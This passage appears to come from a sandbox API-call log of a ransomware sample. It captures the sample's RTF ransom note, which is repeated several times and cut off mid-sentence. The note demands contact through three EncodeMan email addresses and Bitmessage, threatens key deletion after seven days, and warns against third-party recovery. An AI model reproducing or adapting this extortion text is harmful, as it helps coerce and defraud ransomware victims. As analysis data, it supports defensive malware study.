\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.220] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. 